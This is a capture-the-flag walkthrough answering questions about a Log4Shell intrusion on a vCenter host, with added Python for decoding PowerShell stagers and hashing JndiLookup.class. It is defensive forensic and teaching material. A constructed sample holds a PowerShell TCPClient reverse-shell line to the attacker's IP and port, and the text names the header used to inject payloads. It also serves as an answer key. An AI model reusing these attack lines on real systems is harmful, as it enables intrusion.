DetectLog4j
For the last week, the log4shell vulnerability has been gaining much attention, not for its ability to execute arbitrary commands on the vulnerable system but for the wide range of products that depend on
Q1 What is the computer hostname?
For this challenge, I will use Autopsy and FTK Imager.
Go to Operating System Information and you will see the hostname in the right panel (note that your result may differ slightly from mine, as the image was still loading).

Answer: vcw65
Q2 What is the Timezone of the compromised machine?
We need to open the SYSTEM hive to find the timezone.
It is located at the following path: windows/system32/config
The SYSTEM file will appear in the right panel.
We will use FTK Imager this time, until Autopsy finishes loading.

Export the file, then load the hive with Registry Editor.
Go to the path: system\ControlSet001\Control\TimeZoneInformation to find the timezone.

The time zone is Pacific Standard Time; google it to get the UTC offset.

Answer: UTC-8
Q3 What is the current build number on the system?
From the same path as in Q2 in FTK Imager, scroll down to the SOFTWARE file and export it.

Load the hive using Registry Editor and go to the path: software\Microsoft\Windows NT\CurrentVersion

Answer: 14393
Q4 What is the computer IP?
In Registry Editor, go to the path: system\ControlSet001\Services\Tcpip\Parameters\Interfaces\{82e90056-fd8d-4a24-913a-fc46f535fddf}

Answer: 192.168.112.139
Q5 What is the domain the computer was assigned to?
In Registry Editor, go to the path:
system\ControlSet001\Services\Tcpip\Parameters

Answer: cyberdefenders.org
Q6 When was the myoussef user created?
Now we use Autopsy: the "Account" panel shows the creation time of the mentioned user.
Answer: 2021-12-28 06:57:23 utc
Q7 What is the user mhasan's password hint?
From the same "Account" panel as in Q6:

Answer: https://www.linkedin.com/in/0xmohamedhasan/
Q8 What is the version of the VMware product installed on the machine?
In Registry Editor, go to the path: software\VMware, Inc.\apacheTomcat

Another way, using Autopsy: check the Installed Programs section.

Answer: 6.7.0.40322
Q9 What is the version of the log4j library used by the installed VMware product?
Actually, I didn't know how to find the library path, so I tried to search for it by name using Autopsy, and fortunately I found it.

Answer: 2.11.2
Q10 What is the log4j library log level specified in the configuration file?
Search for log4j.properties and read the files until you find the log level setting.

Answer: INFO
Q11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?
A Google search shows that the header is x-forwarded-for.
Answer: x-forwarded-for
Q12 The attacker used the log4shell.huntress.com payload to detect if the vCenter instance is vulnerable. What is the first link of the log4huntress payload?
In Autopsy, search for log4shell.huntress.com and export the log file.

Answer: log4shell.huntress.com:1389/b1292f3c-a652-4240-8fb4-59c43141f55a
Q13 When was the first successful login to vsphere WebClient?
Search for audit_events in Autopsy, or go to the path: ProgramData\VMware\vCenterServer\runtime\VMwareSTSService\logs
Then find the earliest Loginsuccess event.

Answer: 28/12/2021 20:39:29 UTC
Q14 What is the attacker's IP address?
From the same events, we can see that the IP 192.168.112.128 tried many times to log in.

Answer: 192.168.112.128
Q15 What is the port the attacker used to receive the Cobalt Strike reverse shell?
Search for the PowerShell launching logs, named Microsoft-Windows-PowerShell%4Operational.evtx,
then search for BASE64.

Using CyberChef, decode from Base64 and gunzip.

Execute the code with FakeNet, then analyze the traffic with Wireshark.
Answer: 1337
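The CyberChef step above (Base64, then gunzip) done offline in Python, with a first static pass over the decoded script for `ip,port` pairs before falling back to FakeNet. This is an added example, not code from the original write-up; the `SAMPLE_*` blobs are constructed stand-ins, not the payload from the image.

```python
import base64
import gzip
import re
from typing import List, Tuple

# Constructed sample: the kind of inner script a stager carries once the
# Base64 + gzip layers are removed (not the real payload from the image).
_INNER_SCRIPT = (
    "# constructed sample, not the real stager\n"
    "$client = New-Object System.Net.Sockets.TCPClient('192.168.112.128', 1337)\n"
)
SAMPLE_BLOB = base64.b64encode(gzip.compress(_INNER_SCRIPT.encode())).decode()

# Constructed sample of a plain -EncodedCommand argument (UTF-16LE, no gzip).
SAMPLE_ENCODED = base64.b64encode("Write-Host 'x'".encode("utf-16-le")).decode()


def decode_powershell_blob(blob: str) -> str:
    """Peel Base64, then gzip if the magic bytes are present, then text-decode.

    PowerShell's -EncodedCommand is UTF-16LE; gzip-wrapped stagers are usually
    UTF-8 once decompressed. Null bytes in the first bytes signal UTF-16LE.
    """
    raw = base64.b64decode(blob)
    if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
        raw = gzip.decompress(raw)
    encoding = "utf-16-le" if b"\x00" in raw[:4] else "utf-8"
    try:
        return raw.decode(encoding)
    except UnicodeDecodeError:
        return raw.decode("latin-1")


# Matches "'1.2.3.4', 1337" (TCPClient style) as well as "1.2.3.4:1337".
ENDPOINT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})['\"]?\s*[,:]\s*(\d{1,5})")


def extract_endpoints(script: str) -> List[Tuple[str, int]]:
    """Return (ip, port) pairs spelled out in the decoded script."""
    return [(ip, int(port)) for ip, port in ENDPOINT_RE.findall(script)]


if __name__ == "__main__":
    decoded = decode_powershell_blob(SAMPLE_BLOB)
    print(decoded)
    print(extract_endpoints(decoded))  # [('192.168.112.128', 1337)]
```

A real Cobalt Strike stager normally keeps the address inside a second Base64 shellcode blob rather than as text, so when this static pass finds nothing, the FakeNet plus Wireshark route above is still the way to recover the port.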
Q16 What is the script name published by VMware to mitigate log4shell vulnerability?
Google it,

Answer: vc_log4j_mitigator.py
Q17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to 'true' to work around the log4shell vulnerability?
Again, google it, then try both solutions:
log4j2.formatMsgNoLookups
or the LOG4J_FORMAT_MSG_NO_LOOKUPS

Answer: log4j2.formatMsgNoLookups
Q18 What is the log4j version which contains a patch to CVE-2021-44228?
Search for the CVE-2021-44228 patch.

Answer: 2.15.0
Q19 Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the JNDILookup.class?
Search for JNDILookup.class and export the containing file,

then extract the archive and locate JNDILookup.class inside it.

Finally, hash it using HashMyFiles.

Answer: 0f038a1e0aa0aff76d66d1440c88a2b35a3d023ad8b2e3bac8e25a3208499f7e
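The export, extract and hash steps of Q19, together with the version lookup of Q9, done in one pass over a log4j-core jar: the jar is opened as a zip, the `version=` line of its Maven `pom.properties` is read, and `JndiLookup.class` is hashed without unpacking to disk. This is an added example, not code from the original write-up; `build_sample_jar` produces a constructed jar with a dummy class body, so its hash is not the answer above.

```python
import hashlib
import io
import re
import zipfile
from typing import Dict, Optional

JNDI_CLASS = "jndilookup.class"  # compared case-insensitively on the basename


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def inspect_log4j_jar(data: bytes) -> Dict[str, Optional[str]]:
    """Return log4j-core version and SHA-256 of JndiLookup.class from jar bytes.

    The version is taken from META-INF/maven/.../pom.properties when present.
    Fields stay None when the jar does not contain them (e.g. class removed).
    """
    result: Dict[str, Optional[str]] = {"version": None, "jndi_class_path": None, "jndi_sha256": None}
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        for name in jar.namelist():
            base = name.rsplit("/", 1)[-1].lower()
            if base == JNDI_CLASS:
                result["jndi_class_path"] = name
                result["jndi_sha256"] = sha256_hex(jar.read(name))
            elif name.startswith("META-INF/maven/") and name.endswith("pom.properties"):
                m = re.search(r"^version=(.+)$", jar.read(name).decode("utf-8", "replace"), re.M)
                if m:
                    result["version"] = m.group(1).strip()
    return result


# Constructed sample jar: a dummy body stands in for the real class bytecode.
SAMPLE_CLASS_BYTES = b"\xca\xfe\xba\xbeconstructed-dummy-class"


def build_sample_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(
            "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
            "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.11.2\n",
        )
        jar.writestr("org/apache/logging/log4j/core/lookup/JndiLookup.class", SAMPLE_CLASS_BYTES)
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_log4j_jar(build_sample_jar()))
```

On the real image the jar sits inside the vCenter installation, so point `inspect_log4j_jar` at the exported jar's bytes; a `None` hash means the class has already been removed, which is exactly the mitigation Q19 describes.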
Q20 Analyze JNDILookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?
In Autopsy, search for "CONTAINER_JNDI_RESOURCE_PATH_PREFIX".
Answer: java: comp/env/
Q21 What is the executable used by the attacker to gain persistence?
To find that, we need to look for any startup program or executable,
so search the user's files for NTUSER.DAT.
We will find it at the path: root\Users\Administrator.WIN-B633EO9K91M\NTUSER.DAT

Export the file and open the hive using Registry Editor.
Finally, search for any key containing "Run"; we will find "RunOnce".

Answer: baaaackdooor.exe
Q22 When was the first submission of the ransomware to VirusTotal?
After many searches, I found that the first ransomware submitted is "khonsari.exe";
then I searched for its analysis report.

Answer: 2021-12-11 22:57:01
Q24 What is the ISP that owns that IP that serves the text file?
From the previous VirusTotal report, the domain is Amazon.
Answer: Amazon
Q25 The ransomware checks for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?
From the Khonsari ransomware analysis article, we can see its behavior.

Answer: ini
Hope that helps you, and thank you :)